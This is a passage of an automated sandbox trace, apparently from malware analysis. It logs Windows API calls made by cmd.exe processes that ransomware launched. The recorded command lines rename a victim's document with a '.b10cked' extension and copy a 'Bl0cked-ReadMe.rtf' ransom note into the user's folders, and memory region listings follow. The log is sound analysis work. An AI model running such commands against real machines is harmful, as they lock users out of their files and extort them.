lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x9, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x9, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x9, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegCloseKey (hKey=0x40) returned 0x0 [0234.983] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.983] srand (_Seed=0x5b8863c2) [0234.983] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"" [0234.983] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"" [0234.984] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.984] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x191968, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.984] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.984] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.984] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.984] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.984] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.984] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.984] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.984] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.984] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.984] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.984] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.984] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.984] GetEnvironmentStringsW () returned 0x192358* [0234.985] FreeEnvironmentStringsW (penv=0x192358) returned 1 [0234.985] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.985] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.985] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.985] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.985] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.985] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.985] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.985] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.985] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.985] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.985] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f5e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.985] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f5e0, lpFilePart=0x12f5dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f5dc*="Desktop") returned 0x18 [0234.985] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.985] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f35c | out: lpFindFileData=0x12f35c) returned 0x1909e8 [0234.985] FindClose (in: hFindFile=0x1909e8 | out: hFindFile=0x1909e8) returned 1 [0234.985] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f35c | out: lpFindFileData=0x12f35c) returned 0x1909e8 [0234.985] FindClose (in: hFindFile=0x1909e8 | out: hFindFile=0x1909e8) returned 1 [0234.985] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f35c | out: lpFindFileData=0x12f35c) returned 0x1909e8 [0234.986] FindClose (in: hFindFile=0x1909e8 | out: hFindFile=0x1909e8) returned 1 [0234.986] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.986] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.986] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.986] GetEnvironmentStringsW () returned 0x190208* [0234.986] FreeEnvironmentStringsW (penv=0x190208) returned 1 [0234.986] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.986] GetConsoleOutputCP () returned 0x1b5 [0234.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.986] GetUserDefaultLCID () returned 0x409 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f720, cchData=128 | out: lpLCData="0") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f720, cchData=128 | out: lpLCData="0") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f720, cchData=128 | out: lpLCData="1") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.987] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.988] GetConsoleTitleW (in: lpConsoleTitle=0x180928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.988] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.988] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.988] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.989] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.989] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.989] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.989] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.989] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.989] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.989] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.992] GetConsoleTitleW (in: lpConsoleTitle=0x12f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.993] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.993] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.993] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.993] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.993] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.993] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.993] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.993] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.993] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.993] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.993] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.993] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.993] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.993] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.993] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.993] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.993] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.993] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.993] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.993] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.993] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.993] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.993] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.993] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.993] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.993] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.993] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.993] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.993] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.993] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.995] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.995] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.995] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f1d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f1cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f1cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.996] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.996] _wcsicmp (_String1="ieMCxg.pps", _String2=".") returned 59 [0234.996] _wcsicmp (_String1="ieMCxg.pps", _String2="..") returned 59 [0234.996] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps")) returned 0x20 [0234.996] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x191f08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.997] SetErrorMode (uMode=0x0) returned 0x0 [0234.997] SetErrorMode (uMode=0x1) returned 0x0 [0234.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", nBufferLength=0x104, lpBuffer=0x12eb5c, lpFilePart=0x12eb44 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", lpFilePart=0x12eb44*="ieMCxg.pps") returned 0x3d [0234.997] SetErrorMode (uMode=0x0) returned 0x1 [0234.997] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x12 [0234.997] _wcsicmp (_String1="ieMCxg.pps", _String2=".") returned 59 [0234.997] _wcsicmp (_String1="ieMCxg.pps", _String2="..") returned 59 [0234.997] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps")) returned 0x20 [0234.997] SetErrorMode (uMode=0x0) returned 0x0 [0234.997] SetErrorMode (uMode=0x1) returned 0x0 [0234.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", nBufferLength=0x104, lpBuffer=0x12efd8, lpFilePart=0x12ed70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", lpFilePart=0x12ed70*="ieMCxg.pps") returned 0x3d [0234.997] SetErrorMode (uMode=0x0) returned 0x1 [0234.997] SetErrorMode (uMode=0x0) returned 0x0 [0234.997] SetErrorMode (uMode=0x1) returned 0x0 [0234.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked", nBufferLength=0x104, lpBuffer=0x12f1e0, lpFilePart=0x12ed70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked", lpFilePart=0x12ed70*="ieMCxg.pps.b10cked") returned 0x45 [0234.997] SetErrorMode (uMode=0x0) returned 0x1 [0234.997] SetLastError (dwErrCode=0x0) [0234.997] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps.b10cked")) returned 0xffffffff [0234.997] GetLastError () returned 0x2 [0234.997] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", fInfoLevelId=0x1, lpFindFileData=0x12e6ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e6ec) returned 0x192118 [0234.998] FindNextFileW (in: hFindFile=0x192118, lpFindFileData=0x12e6ec | out: lpFindFileData=0x12e6ec) returned 0 [0234.998] GetLastError () returned 0x12 [0234.998] FindClose (in: hFindFile=0x192118 | out: hFindFile=0x192118) returned 1 [0234.999] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", fInfoLevelId=0x1, lpFindFileData=0x191ca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x191ca8) returned 0x192118 [0234.999] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked", nBufferLength=0x104, lpBuffer=0x12e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked", lpFilePart=0x0) returned 0x45 [0234.999] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", nBufferLength=0x104, lpBuffer=0x12e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", lpFilePart=0x0) returned 0x3d [0234.999] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps")) returned 0x20 [0235.000] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps.b10cked"), dwFlags=0x3) returned 1 [0235.000] FindClose (in: hFindFile=0x192118 | out: hFindFile=0x192118) returned 1 [0235.000] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12e938 | out: _Buffer=" 1") returned 9 [0235.000] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.000] GetFileType (hFile=0x7) returned 0x2 [0235.378] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.378] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12e8c4 | out: lpMode=0x12e8c4) returned 1 [0235.378] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12e8f8 | out: lpConsoleScreenBufferInfo=0x12e8f8) returned 1 [0235.378] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.379] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x12e938 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.379] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12e91c, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x12e91c*=0x1a) returned 1 [0235.379] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.379] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.379] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.379] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.379] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.379] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.379] SetConsoleInputExeNameW () returned 0x1 [0235.379] GetConsoleOutputCP () returned 0x1b5 [0235.379] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.379] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.380] exit (_Code=0) Process: id = "628" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34988 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34989 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34990 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34991 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 34992 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34993 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34994 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34995 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34996 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 34997 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35354 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35355 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35356 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35357 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 35358 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 35359 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35360 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35361 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 